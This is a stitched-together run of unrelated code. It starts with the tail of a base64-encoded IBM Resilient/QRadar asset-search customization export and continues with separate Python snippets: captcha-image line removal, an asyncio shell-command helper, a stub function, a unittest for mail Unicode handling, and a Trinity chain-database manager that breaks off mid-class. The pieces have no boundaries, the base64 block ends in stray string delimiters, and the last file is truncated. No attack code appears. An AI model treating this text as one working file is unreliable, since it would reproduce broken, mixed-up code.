MDEvWE1MU2NoZW1hXCIgeG1sbnM6eHNpPVwiaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hl
bWEtaW5zdGFuY2VcIiB0YXJnZXROYW1lc3BhY2U9XCJodHRwOi8vd3d3LmNhbXVuZGEub3JnL3Rl
c3RcIj48cHJvY2VzcyBpZD1cImV4YW1wbGVfcXJhZGFyX2Fzc2V0X3NlYXJjaFwiIGlzRXhlY3V0
YWJsZT1cInRydWVcIiBuYW1lPVwiRXhhbXBsZTogUVJhZGFyIEFzc2V0IFNlYXJjaFwiPjxkb2N1
bWVudGF0aW9uPlRoaXMgd29ya2Zsb3cgZGVtb25zdHJhdGVzIHRoZSBhYmlsaXR5IHRvIHJ1biB0
aGUgUVJhZGFyIGZ1bmN0aW9uIHdoaWNoIGlkZW50aWZpZXMgdGVjaG5pY2FsIG5hbWUgYW5kIGNv
bnRhY3QgaW5mb3JtYXRpb24gZnJvbSBhbiBhc3NldCBhbmQgYWRkcyBpdCB0byBhIGRhdGEgdGFi
bGUgaW4gdGhlIGluY2lkZW50LjwvZG9jdW1lbnRhdGlvbj48c3RhcnRFdmVudCBpZD1cIlN0YXJ0
RXZlbnRfMTU1YXN4bVwiPjxvdXRnb2luZz5TZXF1ZW5jZUZsb3dfMHV4ZTRnYzwvb3V0Z29pbmc+
PC9zdGFydEV2ZW50PjxzZXJ2aWNlVGFzayBpZD1cIlNlcnZpY2VUYXNrXzBzMDEwdzdcIiBuYW1l
PVwiUVJhZGFyIEFzc2V0IFF1ZXJ5XCIgcmVzaWxpZW50OnR5cGU9XCJmdW5jdGlvblwiPjxleHRl
bnNpb25FbGVtZW50cz48cmVzaWxpZW50OmZ1bmN0aW9uIHV1aWQ9XCI5ZjdlMzFmNS04ZTEyLTRh
MzQtOWVhYi01OTg4MmEyN2M5YWJcIj57XCJpbnB1dHNcIjp7fSxcInBvc3RfcHJvY2Vzc2luZ19z
Y3JpcHRcIjpcImFzc2V0X3Jlc3VsdHMgPSByZXN1bHRzLnZhbHVlXFxuXFxuZm9yIGFzc2V0X3Jl
c3VsdCBpbiBhc3NldF9yZXN1bHRzOlxcbiAgcm93ID0gaW5jaWRlbnQuYWRkUm93KFxcXCJxcmFk
YXJfYXNzZXRfcmVzdWx0c1xcXCIpXFxuICByb3cuYXNzZXRfaWQgPSBhc3NldF9yZXN1bHRbJ2Fz
c2V0X2lkJ11cXG4gIHJvdy50ZWNobmljYWxfY29udGFjdCA9IGFzc2V0X3Jlc3VsdFsnYXNzZXRf
dGVjaG5pY2FsX2NvbnRhY3QnXVxcbiAgcm93LnRlY2huaWNhbF9uYW1lID0gYXNzZXRfcmVzdWx0
Wydhc3NldF90ZWNobmljYWxfbmFtZSddXCIsXCJwcmVfcHJvY2Vzc2luZ19zY3JpcHRcIjpcImlu
cHV0cy5pbmNpZGVudF9pZCA9IGluY2lkZW50LmlkXCJ9PC9yZXNpbGllbnQ6ZnVuY3Rpb24+PC9l
eHRlbnNpb25FbGVtZW50cz48aW5jb21pbmc+U2VxdWVuY2VGbG93XzB1eGU0Z2M8L2luY29taW5n
PjxvdXRnb2luZz5TZXF1ZW5jZUZsb3dfMGo4NWI4MTwvb3V0Z29pbmc+PC9zZXJ2aWNlVGFzaz48
c2VxdWVuY2VGbG93IGlkPVwiU2VxdWVuY2VGbG93XzB1eGU0Z2NcIiBzb3VyY2VSZWY9XCJTdGFy
dEV2ZW50XzE1NWFzeG1cIiB0YXJnZXRSZWY9XCJTZXJ2aWNlVGFza18wczAxMHc3XCIvPjxlbmRF
dmVudCBpZD1cIkVuZEV2ZW50XzE0N2x5bDhcIj48aW5jb21pbmc+U2VxdWVuY2VGbG93XzBqODVi
ODE8L2luY29taW5nPjwvZW5kRXZlbnQ+PHNlcXVlbmNlRmxvdyBpZD1cIlNlcXVlbmNlRmxvd18w
ajg1YjgxXCIgc291cmNlUmVmPVwiU2VydmljZVRhc2tfMHMwMTB3N1wiIHRhcmdldFJlZj1cIkVu
ZEV2ZW50XzE0N2x5bDhcIi8+PHRleHRBbm5vdGF0aW9uIGlkPVwiVGV4dEFubm90YXRpb25fMWt4
eGl5dFwiPjx0ZXh0PlN0YXJ0IHlvdXIgd29ya2Zsb3cgaGVyZTwvdGV4dD48L3RleHRBbm5vdGF0
aW9uPjxhc3NvY2lhdGlvbiBpZD1cIkFzc29jaWF0aW9uXzFzZXVqNDhcIiBzb3VyY2VSZWY9XCJT
dGFydEV2ZW50XzE1NWFzeG1cIiB0YXJnZXRSZWY9XCJUZXh0QW5ub3RhdGlvbl8xa3h4aXl0XCIv
PjwvcHJvY2Vzcz48YnBtbmRpOkJQTU5EaWFncmFtIGlkPVwiQlBNTkRpYWdyYW1fMVwiPjxicG1u
ZGk6QlBNTlBsYW5lIGJwbW5FbGVtZW50PVwidW5kZWZpbmVkXCIgaWQ9XCJCUE1OUGxhbmVfMVwi
PjxicG1uZGk6QlBNTlNoYXBlIGJwbW5FbGVtZW50PVwiU3RhcnRFdmVudF8xNTVhc3htXCIgaWQ9
XCJTdGFydEV2ZW50XzE1NWFzeG1fZGlcIj48b21nZGM6Qm91bmRzIGhlaWdodD1cIjM2XCIgd2lk
dGg9XCIzNlwiIHg9XCIxNjJcIiB5PVwiMTg4XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxvbWdkYzpC
b3VuZHMgaGVpZ2h0PVwiMFwiIHdpZHRoPVwiOTBcIiB4PVwiMTU3XCIgeT1cIjIyM1wiLz48L2Jw
bW5kaTpCUE1OTGFiZWw+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTlNoYXBlIGJwbW5F
bGVtZW50PVwiVGV4dEFubm90YXRpb25fMWt4eGl5dFwiIGlkPVwiVGV4dEFubm90YXRpb25fMWt4
eGl5dF9kaVwiPjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiMzBcIiB3aWR0aD1cIjEwMFwiIHg9XCI5
OVwiIHk9XCIyNTRcIi8+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTkVkZ2UgYnBtbkVs
ZW1lbnQ9XCJBc3NvY2lhdGlvbl8xc2V1ajQ4XCIgaWQ9XCJBc3NvY2lhdGlvbl8xc2V1ajQ4X2Rp
XCI+PG9tZ2RpOndheXBvaW50IHg9XCIxNjlcIiB4c2k6dHlwZT1cIm9tZ2RjOlBvaW50XCIgeT1c
IjIyMFwiLz48b21nZGk6d2F5cG9pbnQgeD1cIjE1M1wiIHhzaTp0eXBlPVwib21nZGM6UG9pbnRc
IiB5PVwiMjU0XCIvPjwvYnBtbmRpOkJQTU5FZGdlPjxicG1uZGk6QlBNTlNoYXBlIGJwbW5FbGVt
ZW50PVwiU2VydmljZVRhc2tfMHMwMTB3N1wiIGlkPVwiU2VydmljZVRhc2tfMHMwMTB3N19kaVwi
PjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiODBcIiB3aWR0aD1cIjEwMFwiIHg9XCI0ODlcIiB5PVwi
MTY2XCIvPjwvYnBtbmRpOkJQTU5TaGFwZT48YnBtbmRpOkJQTU5FZGdlIGJwbW5FbGVtZW50PVwi
U2VxdWVuY2VGbG93XzB1eGU0Z2NcIiBpZD1cIlNlcXVlbmNlRmxvd18wdXhlNGdjX2RpXCI+PG9t
Z2RpOndheXBvaW50IHg9XCIxOThcIiB4c2k6dHlwZT1cIm9tZ2RjOlBvaW50XCIgeT1cIjIwNlwi
Lz48b21nZGk6d2F5cG9pbnQgeD1cIjQ4OVwiIHhzaTp0eXBlPVwib21nZGM6UG9pbnRcIiB5PVwi
MjA2XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiMTNcIiB3aWR0
aD1cIjBcIiB4PVwiMzQzLjVcIiB5PVwiMTg0XCIvPjwvYnBtbmRpOkJQTU5MYWJlbD48L2JwbW5k
aTpCUE1ORWRnZT48YnBtbmRpOkJQTU5TaGFwZSBicG1uRWxlbWVudD1cIkVuZEV2ZW50XzE0N2x5
bDhcIiBpZD1cIkVuZEV2ZW50XzE0N2x5bDhfZGlcIj48b21nZGM6Qm91bmRzIGhlaWdodD1cIjM2
XCIgd2lkdGg9XCIzNlwiIHg9XCI3OTFcIiB5PVwiMTg4XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxv
bWdkYzpCb3VuZHMgaGVpZ2h0PVwiMTNcIiB3aWR0aD1cIjBcIiB4PVwiODA5XCIgeT1cIjIyN1wi
Lz48L2JwbW5kaTpCUE1OTGFiZWw+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTkVkZ2Ug
YnBtbkVsZW1lbnQ9XCJTZXF1ZW5jZUZsb3dfMGo4NWI4MVwiIGlkPVwiU2VxdWVuY2VGbG93XzBq
ODViODFfZGlcIj48b21nZGk6d2F5cG9pbnQgeD1cIjU4OVwiIHhzaTp0eXBlPVwib21nZGM6UG9p
bnRcIiB5PVwiMjA2XCIvPjxvbWdkaTp3YXlwb2ludCB4PVwiNzkxXCIgeHNpOnR5cGU9XCJvbWdk
YzpQb2ludFwiIHk9XCIyMDZcIi8+PGJwbW5kaTpCUE1OTGFiZWw+PG9tZ2RjOkJvdW5kcyBoZWln
aHQ9XCIxM1wiIHdpZHRoPVwiMFwiIHg9XCI2OTBcIiB5PVwiMTg0XCIvPjwvYnBtbmRpOkJQTU5M
YWJlbD48L2JwbW5kaTpCUE1ORWRnZT48L2JwbW5kaTpCUE1OUGxhbmU+PC9icG1uZGk6QlBNTkRp
YWdyYW0+PC9kZWZpbml0aW9ucz4iLCAid29ya2Zsb3dfaWQiOiAiZXhhbXBsZV9xcmFkYXJfYXNz
ZXRfc2VhcmNoIiwgInZlcnNpb24iOiA3fSwgImxhc3RfbW9kaWZpZWRfdGltZSI6IDE1NDcwNDI3
OTI4NzIsICJjcmVhdG9yX2lkIjogImdlcmFsZC50cm90bWFuQGlibS5jb20iLCAiYWN0aW9ucyI6
IFtdLCAicHJvZ3JhbW1hdGljX25hbWUiOiAiZXhhbXBsZV9xcmFkYXJfYXNzZXRfc2VhcmNoIiwg
Im5hbWUiOiAiRXhhbXBsZTogUVJhZGFyIEFzc2V0IFNlYXJjaCJ9XSwgImFjdGlvbnMiOiBbeyJs
b2dpY190eXBlIjogImFsbCIsICJuYW1lIjogIkV4YW1wbGU6IFFSYWRhciBRdWVyeSIsICJ2aWV3
X2l0ZW1zIjogW10sICJ0eXBlIjogMSwgIndvcmtmbG93cyI6IFsiZXhhbXBsZV9xcmFkYXJfYXNz
ZXRfc2VhcmNoIl0sICJvYmplY3RfdHlwZSI6ICJpbmNpZGVudCIsICJ0aW1lb3V0X3NlY29uZHMi
OiA4NjQwMCwgInV1aWQiOiAiMzg3ZWMzN2ItOTExMS00MzhhLThjYzAtNDUyMWNjODNmMTAzIiwg
ImF1dG9tYXRpb25zIjogW10sICJleHBvcnRfa2V5IjogIkV4YW1wbGU6IFFSYWRhciBRdWVyeSIs
ICJjb25kaXRpb25zIjogW10sICJpZCI6IDE2OSwgIm1lc3NhZ2VfZGVzdGluYXRpb25zIjogW119
XSwgImxheW91dHMiOiBbXSwgImV4cG9ydF9mb3JtYXRfdmVyc2lvbiI6IDIsICJpZCI6IDU3LCAi
aW5kdXN0cmllcyI6IG51bGwsICJwaGFzZXMiOiBbXSwgImFjdGlvbl9vcmRlciI6IFtdLCAiZ2Vv
cyI6IG51bGwsICJsb2NhbGUiOiBudWxsLCAic2VydmVyX3ZlcnNpb24iOiB7Im1ham9yIjogMzIs
ICJ2ZXJzaW9uIjogIjMyLjAuNDUwMiIsICJidWlsZF9udW1iZXIiOiA0NTAyLCAibWlub3IiOiAw
fSwgInRpbWVmcmFtZXMiOiBudWxsLCAid29ya3NwYWNlcyI6IFtdLCAiYXV0b21hdGljX3Rhc2tz
IjogW10sICJmdW5jdGlvbnMiOiBbeyJkaXNwbGF5X25hbWUiOiAiUVJhZGFyIEFzc2V0IFF1ZXJ5
IiwgImRlc2NyaXB0aW9uIjogeyJjb250ZW50IjogIlRoaXMgZnVuY3Rpb24gaXMgYSBzaW1wbGUg
cXVlcnkgb2YgUVJhZGFyIGFzc2V0IGluZm9ybWF0aW9uLiBUaGlzIGp1c3QgZmluZHMgYWxsIGFz
c2V0cyB0aGF0IGNvbnRhaW5zIHBob25lIG51bWJlcnMgYW5kIGNvbnRhY3QgbmFtZSBhbmQgcmV0
dXJucyB0aGVtIHRvIGEgZGF0YSB0YWJsZS4iLCAiZm9ybWF0IjogInRleHQifSwgImNyZWF0b3Ii
OiB7ImRpc3BsYXlfbmFtZSI6ICJHZXJhbGQgVHJvdG1hbiIsICJ0eXBlIjogInVzZXIiLCAiaWQi
OiA0LCAibmFtZSI6ICJnZXJhbGQudHJvdG1hbkBpYm0uY29tIn0sICJ2aWV3X2l0ZW1zIjogW3si
c2hvd19pZiI6IG51bGwsICJmaWVsZF90eXBlIjogIl9fZnVuY3Rpb24iLCAic2hvd19saW5rX2hl
YWRlciI6IGZhbHNlLCAiZWxlbWVudCI6ICJmaWVsZF91dWlkIiwgImNvbnRlbnQiOiAiZWFkMjE0
YzItMTNmZS00M2Y2LWEzYzctNjc2YTg4MzM4ZGJiIiwgInN0ZXBfbGFiZWwiOiBudWxsfV0sICJl
eHBvcnRfa2V5IjogInFyYWRhcl9hc3NldF9xdWVyeSIsICJ1dWlkIjogIjlmN2UzMWY1LThlMTIt
NGEzNC05ZWFiLTU5ODgyYTI3YzlhYiIsICJsYXN0X21vZGlmaWVkX2J5IjogeyJkaXNwbGF5X25h
bWUiOiAiR2VyYWxkIFRyb3RtYW4iLCAidHlwZSI6ICJ1c2VyIiwgImlkIjogNCwgIm5hbWUiOiAi
Z2VyYWxkLnRyb3RtYW5AaWJtLmNvbSJ9LCAidmVyc2lvbiI6IDQsICJ3b3JrZmxvd3MiOiBbeyJk
ZXNjcmlwdGlvbiI6IG51bGwsICJvYmplY3RfdHlwZSI6ICJpbmNpZGVudCIsICJhY3Rpb25zIjog
W10sICJuYW1lIjogIkV4YW1wbGU6IFFSYWRhciBBc3NldCBTZWFyY2giLCAid29ya2Zsb3dfaWQi
OiAxNTQsICJwcm9ncmFtbWF0aWNfbmFtZSI6ICJleGFtcGxlX3FyYWRhcl9hc3NldF9zZWFyY2gi
LCAidXVpZCI6IG51bGx9XSwgImxhc3RfbW9kaWZpZWRfdGltZSI6IDE1NDcwNDIxMjgyOTAsICJk
ZXN0aW5hdGlvbl9oYW5kbGUiOiAicXJhZGFyIiwgImlkIjogMTcyLCAibmFtZSI6ICJxcmFkYXJf
YXNzZXRfcXVlcnkifV0sICJub3RpZmljYXRpb25zIjogbnVsbCwgInJlZ3VsYXRvcnMiOiBudWxs
LCAiaW5jaWRlbnRfdHlwZXMiOiBbeyJjcmVhdGVfZGF0ZSI6IDE1NDcwNTU2MzA5NjUsICJkZXNj
cmlwdGlvbiI6ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAiZXhwb3J0X2tl
eSI6ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAiaWQiOiAwLCAibmFtZSI6
ICJDdXN0b21pemF0aW9uIFBhY2thZ2VzIChpbnRlcm5hbCkiLCAidXBkYXRlX2RhdGUiOiAxNTQ3
MDU1NjMwOTY1LCAidXVpZCI6ICJiZmVlYzJkNC0zNzcwLTExZTgtYWQzOS00YTAwMDQwNDRhYTAi
LCAiZW5hYmxlZCI6IGZhbHNlLCAic3lzdGVtIjogZmFsc2UsICJwYXJlbnRfaWQiOiBudWxsLCAi
aGlkZGVuIjogZmFsc2V9XSwgInNjcmlwdHMiOiBbXSwgInR5cGVzIjogW3siZm9yX3dvcmtmbG93
cyI6IGZhbHNlLCAiZGlzcGxheV9uYW1lIjogIlFSYWRhciBBc3NldCBSZXN1bHRzIiwgInV1aWQi
OiAiN2RkMjE0MDEtZGQ2OC00NjE3LTljNmEtYWIxMmVkODc3ODlkIiwgInR5cGVfaWQiOiA4LCAi
ZmllbGRzIjogeyJhc3NldF9pZCI6IHsib3BlcmF0aW9ucyI6IFtdLCAidHlwZV9pZCI6IDEwMDIs
ICJvcGVyYXRpb25fcGVybXMiOiB7fSwgInRleHQiOiAiQXNzZXQgSWQiLCAiYmxhbmtfb3B0aW9u
IjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJpZCI6IDE5Miwg
InJlYWRfb25seSI6IGZhbHNlLCAidXVpZCI6ICIwZDkwOTYyYy1lMGNhLTQ3ODAtYTc5Mi0xNTgw
ZDE5MWMxYzMiLCAiY2hvc2VuIjogZmFsc2UsICJpbnB1dF90eXBlIjogInRleHQiLCAidG9vbHRp
cCI6ICIiLCAid2lkdGgiOiAxODMsICJpbnRlcm5hbCI6IGZhbHNlLCAicmljaF90ZXh0IjogZmFs
c2UsICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAicXJhZGFyX2Fzc2V0X3Jlc3VsdHMv
YXNzZXRfaWQiLCAiaGlkZV9ub3RpZmljYXRpb24iOiBmYWxzZSwgInBsYWNlaG9sZGVyIjogIiIs
ICJuYW1lIjogImFzc2V0X2lkIiwgImRlcHJlY2F0ZWQiOiBmYWxzZSwgImRlZmF1bHRfY2hvc2Vu
X2J5X3NlcnZlciI6IGZhbHNlLCAidmFsdWVzIjogW10sICJvcmRlciI6IDB9LCAidGVjaG5pY2Fs
X2NvbnRhY3QiOiB7Im9wZXJhdGlvbnMiOiBbXSwgInR5cGVfaWQiOiAxMDAyLCAib3BlcmF0aW9u
X3Blcm1zIjoge30sICJ0ZXh0IjogIlRlY2huaWNhbCBDb250YWN0IiwgImJsYW5rX29wdGlvbiI6
IGZhbHNlLCAicHJlZml4IjogbnVsbCwgImNoYW5nZWFibGUiOiB0cnVlLCAiaWQiOiAxOTMsICJy
ZWFkX29ubHkiOiBmYWxzZSwgInV1aWQiOiAiMjExNjZiN2EtMmUzNi00MzVlLTg4MmMtYzhmZGEz
ZmQ5M2Q4IiwgImNob3NlbiI6IGZhbHNlLCAiaW5wdXRfdHlwZSI6ICJ0ZXh0IiwgInRvb2x0aXAi
OiAiIiwgIndpZHRoIjogMjU5LCAiaW50ZXJuYWwiOiBmYWxzZSwgInJpY2hfdGV4dCI6IGZhbHNl
LCAidGVtcGxhdGVzIjogW10sICJleHBvcnRfa2V5IjogInFyYWRhcl9hc3NldF9yZXN1bHRzL3Rl
Y2huaWNhbF9jb250YWN0IiwgImhpZGVfbm90aWZpY2F0aW9uIjogZmFsc2UsICJwbGFjZWhvbGRl
ciI6ICIiLCAibmFtZSI6ICJ0ZWNobmljYWxfY29udGFjdCIsICJkZXByZWNhdGVkIjogZmFsc2Us
ICJkZWZhdWx0X2Nob3Nlbl9ieV9zZXJ2ZXIiOiBmYWxzZSwgInZhbHVlcyI6IFtdLCAib3JkZXIi
OiAxfSwgInRlY2huaWNhbF9uYW1lIjogeyJvcGVyYXRpb25zIjogW10sICJ0eXBlX2lkIjogMTAw
MiwgIm9wZXJhdGlvbl9wZXJtcyI6IHt9LCAidGV4dCI6ICJUZWNobmljYWwgTmFtZSIsICJibGFu
a19vcHRpb24iOiBmYWxzZSwgInByZWZpeCI6IG51bGwsICJjaGFuZ2VhYmxlIjogdHJ1ZSwgImlk
IjogMTk0LCAicmVhZF9vbmx5IjogZmFsc2UsICJ1dWlkIjogImY0OWZjY2JjLWU1MmMtNGM1MC1i
MTBmLTJjODUxYjBmZThmNSIsICJjaG9zZW4iOiBmYWxzZSwgImlucHV0X3R5cGUiOiAidGV4dCIs
ICJ0b29sdGlwIjogIiIsICJ3aWR0aCI6IDIzMywgImludGVybmFsIjogZmFsc2UsICJyaWNoX3Rl
eHQiOiBmYWxzZSwgInRlbXBsYXRlcyI6IFtdLCAiZXhwb3J0X2tleSI6ICJxcmFkYXJfYXNzZXRf
cmVzdWx0cy90ZWNobmljYWxfbmFtZSIsICJoaWRlX25vdGlmaWNhdGlvbiI6IGZhbHNlLCAicGxh
Y2Vob2xkZXIiOiAiIiwgIm5hbWUiOiAidGVjaG5pY2FsX25hbWUiLCAiZGVwcmVjYXRlZCI6IGZh
bHNlLCAiZGVmYXVsdF9jaG9zZW5fYnlfc2VydmVyIjogZmFsc2UsICJ2YWx1ZXMiOiBbXSwgIm9y
ZGVyIjogMn19LCAicGFyZW50X3R5cGVzIjogWyJpbmNpZGVudCJdLCAidHlwZV9uYW1lIjogInFy
YWRhcl9hc3NldF9yZXN1bHRzIiwgImV4cG9ydF9rZXkiOiAicXJhZGFyX2Fzc2V0X3Jlc3VsdHMi
LCAiZm9yX2N1c3RvbV9maWVsZHMiOiBmYWxzZSwgImFjdGlvbnMiOiBbXSwgImlkIjogbnVsbCwg
ImZvcl9hY3Rpb25zIjogZmFsc2UsICJmb3Jfbm90aWZpY2F0aW9ucyI6IGZhbHNlLCAic2NyaXB0
cyI6IFtdLCAicHJvcGVydGllcyI6IHsiZm9yX3dobyI6IFtdLCAiY2FuX2Rlc3Ryb3kiOiBmYWxz
ZSwgImNhbl9jcmVhdGUiOiBmYWxzZX19XSwgIm1lc3NhZ2VfZGVzdGluYXRpb25zIjogW3sidXVp
ZCI6ICI5YzZkOGQyMy01NzdkLTQ5NGYtYmU1MS01ZDE3NDQ1NDRhNTkiLCAiZXhwb3J0X2tleSI6
ICJxcmFkYXIiLCAibmFtZSI6ICJRUmFkYXIiLCAiZGVzdGluYXRpb25fdHlwZSI6IDAsICJwcm9n
cmFtbWF0aWNfbmFtZSI6ICJxcmFkYXIiLCAiZXhwZWN0X2FjayI6IHRydWUsICJ1c2VycyI6IFsi
Z2VyYWxkLnRyb3RtYW5AaWJtLmNvbSJdfV0sICJpbmNpZGVudF9hcnRpZmFjdF90eXBlcyI6IFtd
LCAicm9sZXMiOiBbXSwgImZpZWxkcyI6IFt7Im9wZXJhdGlvbnMiOiBbXSwgInR5cGVfaWQiOiAw
LCAib3BlcmF0aW9uX3Blcm1zIjoge30sICJ0ZXh0IjogIlNpbXVsYXRpb24iLCAiYmxhbmtfb3B0
aW9uIjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJpZCI6IDM3
LCAicmVhZF9vbmx5IjogdHJ1ZSwgInV1aWQiOiAiYzNmMGUzZWQtMjFlMS00ZDUzLWFmZmItZmU1
Y2EzMzA4Y2NhIiwgImNob3NlbiI6IGZhbHNlLCAiaW5wdXRfdHlwZSI6ICJib29sZWFuIiwgInRv
b2x0aXAiOiAiV2hldGhlciB0aGUgaW5jaWRlbnQgaXMgYSBzaW11bGF0aW9uIG9yIGEgcmVndWxh
ciBpbmNpZGVudC4gIFRoaXMgZmllbGQgaXMgcmVhZC1vbmx5LiIsICJpbnRlcm5hbCI6IGZhbHNl
LCAicmljaF90ZXh0IjogZmFsc2UsICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAiaW5j
aWRlbnQvaW5jX3RyYWluaW5nIiwgImhpZGVfbm90aWZpY2F0aW9uIjogZmFsc2UsICJuYW1lIjog
ImluY190cmFpbmluZyIsICJkZXByZWNhdGVkIjogZmFsc2UsICJkZWZhdWx0X2Nob3Nlbl9ieV9z
ZXJ2ZXIiOiBmYWxzZSwgInZhbHVlcyI6IFtdfSwgeyJvcGVyYXRpb25zIjogW10sICJ0eXBlX2lk
IjogMTEsICJvcGVyYXRpb25fcGVybXMiOiB7fSwgInRleHQiOiAiaW5jaWRlbnRfaWQiLCAiYmxh
bmtfb3B0aW9uIjogZmFsc2UsICJwcmVmaXgiOiBudWxsLCAiY2hhbmdlYWJsZSI6IHRydWUsICJp
ZCI6IDExNSwgInJlYWRfb25seSI6IGZhbHNlLCAidXVpZCI6ICJlYWQyMTRjMi0xM2ZlLTQzZjYt
YTNjNy02NzZhODgzMzhkYmIiLCAiY2hvc2VuIjogZmFsc2UsICJpbnB1dF90eXBlIjogIm51bWJl
ciIsICJ0b29sdGlwIjogIiIsICJpbnRlcm5hbCI6IGZhbHNlLCAicmljaF90ZXh0IjogZmFsc2Us
ICJ0ZW1wbGF0ZXMiOiBbXSwgImV4cG9ydF9rZXkiOiAiX19mdW5jdGlvbi9pbmNpZGVudF9pZCIs
ICJoaWRlX25vdGlmaWNhdGlvbiI6IGZhbHNlLCAicGxhY2Vob2xkZXIiOiAiIiwgIm5hbWUiOiAi
aW5jaWRlbnRfaWQiLCAiZGVwcmVjYXRlZCI6IGZhbHNlLCAiZGVmYXVsdF9jaG9zZW5fYnlfc2Vy
dmVyIjogZmFsc2UsICJ2YWx1ZXMiOiBbXX1dLCAib3ZlcnJpZGVzIjogW10sICJleHBvcnRfZGF0
ZSI6IDE1NDcwNDMyNDY3MTh9
"""
)
|
import numpy as np
from PIL import Image
class processed_image():
def __init__(self,path):
self.img = np.array(Image.open(path).convert('L'), 'f')
self.height,self.width = self.img.shape
self.all_lines = [set() for i in range(self.width)]
self.line = [-1] * self.width
def show_image(self):
img = self.img.astype('uint8')
img = Image.fromarray(img)
img.show()
img.save('type5_cutline.png')
def get_all_lines(self):
i = 0
while i < self.height:
if self.img[i][0] == 0:
line_size = 0
for j in range(5):
if self.img[i+j][0] != 0:
line_size = j
break
self.line = [-1] * self.width
self.line[0] = i
for j in range(line_size):
self.all_lines[0].add(i+j)
self.get_line(1,-1,line_size)
i = i + line_size
i = i + 1
self.remove_line()
# if self.img[i][self.width-1] == 0:
# self.line = [-1] * self.width
# self.line[self.width-1] = i
# self.get_line(self.width-2,1)
# self.remove_line()
def remove_line(self):
for index, i in enumerate(self.all_lines):
for j in i:
self.img[j][index] = 255
def get_line(self,n,num,line_size):
if n < self.width:
if self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]][n] == 0 and self.img[self.line[n+num]+line_size-1][n] == 0:
self.line[n] = self.line[n+num]
# self.get_line(n-num,num,line_size)
elif self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]-1][n] == 0 and self.img[self.line[n+num]-1+line_size-1][n] == 0:
self.line[n] = self.line[n+num] - 1
# self.get_line(n-num,num,line_size)
elif self.line[n+num] > 0 and self.line[n+num] < self.height and self.img[self.line[n+num]+1][n] == 0 and self.img[self.line[n+num]+1+line_size-1][n] == 0:
self.line[n] = self.line[n+num] + 1
# self.get_line(n-num,num,line_size)
for i in range(line_size):
self.all_lines[n].add(self.line[n]+i)
self.get_line(n - num, num, line_size)
path = '/Users/lvyufeng/Documents/captcha_train_set/type5_train/type5_train_19924.png'
img = processed_image(path)
img.show_image()
img.get_all_lines()
img.show_image()
|
import asyncio
import functools
import shlex
from typing import Tuple
async def runcmd(cmd: str) -> Tuple[str, str, int, int]:
args = shlex.split(cmd)
process = await asyncio.create_subprocess_exec(
*args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
return (
stdout.decode("utf-8", "replace").strip(),
stderr.decode("utf-8", "replace").strip(),
process.returncode,
process.pid,
)
def run_sync(func, *args, **kwargs):
return asyncio.get_event_loop().run_in_executor(
None, functools.partial(func, *args, **kwargs)
)
def run_async(loop, coro):
return asyncio.run_coroutine_threadsafe(coro, loop).result()
# hellbot
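# Usage sketch (inside an async context; the command string is hypothetical):
#
# stdout, stderr, returncode, pid = await runcmd("uname -a")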
|
def predict(text):
print(text)
return [1,0,0,1,1]
|
print("today is 2018-8-5 ")
|
# coding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
import unittest
from auto_nag.mail import replaceUnicode
class TestMail(unittest.TestCase):
def test_replaceUnicode(self):
s = 'some letters and a é and a è, what else ?...'.decode('utf-8')
r = replaceUnicode(s)
assert r == 'some letters and a é and a è, what else ?...'
s = 'some letters and a é and a è'.decode('utf-8')
r = replaceUnicode(s)
assert r == 'some letters and a é and a è'
s = 'some letters with no accents, just pure ascii'.decode('utf-8')
r = replaceUnicode(s)
assert r == s
s = ''
r = replaceUnicode(s)
assert r == s
|
# Typeshed definitions for multiprocessing.managers is incomplete, so ignore them for now:
# https://github.com/python/typeshed/blob/85a788dbcaa5e9e9a62e55f15d44530cd28ba830/stdlib/3/multiprocessing/managers.pyi#L3
from multiprocessing.managers import ( # type: ignore
BaseManager,
)
import pathlib
from typing import Type
from eth import MainnetChain, RopstenChain
from eth.chains.base import BaseChain
from eth.db.backends.base import BaseAtomicDB
from trinity.chains.header import (
AsyncHeaderChain,
AsyncHeaderChainProxy,
)
from trinity.chains.proxy import ChainProxy
from trinity.config import TrinityConfig
from trinity.db.base import DBProxy
from trinity.db.chain import AsyncChainDB, ChainDBProxy
from trinity.db.header import (
AsyncHeaderDB,
AsyncHeaderDBProxy,
)
from trinity.initialization import (
is_database_initialized,
initialize_database,
)
from trinity.constants import (
MAINNET_NETWORK_ID,
ROPSTEN_NETWORK_ID,
)
from trinity.utils.mp import TracebackRecorder
def get_chaindb_manager(trinity_config: TrinityConfig, base_db: BaseAtomicDB) -> BaseManager:
chaindb = AsyncChainDB(base_db)
if not is_database_initialized(chaindb):
initialize_database(trinity_config, chaindb)
chain_class: Type[BaseChain]
chain: BaseChain
if trinity_config.network_id == MAINNET_NETWORK_ID:
chain_class = MainnetChain
chain = chain_class(base_db)
elif trinity_config.network_id == ROPSTEN_NETWORK_ID:
chain_class = RopstenChain
chain = chain_class(base_db)
else:
raise NotImplementedError("Only the ropsten and mainnet chains are supported")
headerdb = AsyncHeaderDB(base_db)
header_chain = AsyncHeaderChain(base_db)
class DBManager(BaseManager):
pass
